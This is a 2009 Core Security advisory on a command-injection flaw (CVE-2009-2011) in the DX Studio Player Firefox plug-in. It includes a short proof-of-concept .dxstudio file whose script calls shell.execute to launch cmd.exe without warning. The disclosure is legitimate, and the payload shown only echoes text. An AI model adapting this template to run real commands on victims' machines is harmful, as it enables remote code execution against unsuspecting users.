CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS
Percentile
98.7%
**Title:**DX Studio Player Firefox plug-in command injection
**Advisory ID:**CORE-2009-0521
**Advisory URL:**http://www.coresecurity.com/core-labs/advisories/DXStudio-player-firefox-plugin
**Date published:**2009-06-09
**Date of last update:**2009-06-08
**Vendors contacted:**Worldweaver
**Release mode:**Coordinated release
**Class:**Command injection
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
**Bugtraq ID:**N/A
CVE Name:CVE-2009-2011
DX Studio is a complete integrated development environment for creating interactive 3D graphics. DX Studio Player plug-in for Firefox is vulnerable to a remote command execution vulnerability.
On 1st June DXStudio team patched the current release 3.0.29 to 3.0.29.1 for all new downloads to fix the problem with Firefox.
This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies.
DX Studio is a complete integrated development environment for creating interactive 3D graphics. DX Studio provides a javascript API in which the method shell.execute()
is defined as follows:
Prototype: shell.execute(commandString, [paramString], [commandIsProgId]);
This method sends the commandString
to the Windows shell with optional parameters in paramString
. For security reasons, this function is not available when running in a web browser. If you set commandIsProgId
to true, you can launch a utility by its ProgID
, e.g. WMP.DVD
with parameter play
would play a DVD in Windows Media Player.
In our tests, despite what is stated in the documentation, we found that the function is actually available to both the Internet Explorer and Firefox browser plug-ins. In the IE plug-in the user does get a warning about the security implications of allowing such .dxstudio
file to run. On Firefox however, there is no such warning whatsoever, allowing an attacker to execute arbitrary code on the client side by luring the victim into clicking a link or visiting a malicious website.
<?xml version="1.0" encoding="utf-8" standalone="yes"?> <dxstudio version="1.0.0" width="800" height="600"
defaultscriptlanguage="javascript"> <display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no"
maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes" changeresolution="no" userresize="yes"
workarea="no" windowmask="no" src="" minplayerversion="1.0.0"> <loading console="yes" custom="no"
custombackground="no" customlogo="yes" showversion="no"> <prop id="background" type="color" r="0" g="0" b="0"
a="1" /> <logo src="" /> <customprogress /> </loading> </display> <script> <![CDATA[function onInit()
{ shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.") } ] ]> </script> <licenseinfo stamp="cgdaaaaa"
/> <security> <prop id="password" type="string" value="" /> <prop id="allowplayer" type="bool" state="no" />
<prop id="nocache" type="bool" state="yes" /> </security> </dxstudio>
Note: The security vulnerability is also exploitable on the standalone player, however, this functionality appears to be the expected behavior and fully intended for the standalone player.
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/core-labs.
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company’s flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached on the Web at <https://www.coresecurity.com>.
The contents of this advisory are copyright © 2009 Core Security Technologies and © 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
This advisory has been signed with the GPG key of Core Security Technologies advisories team.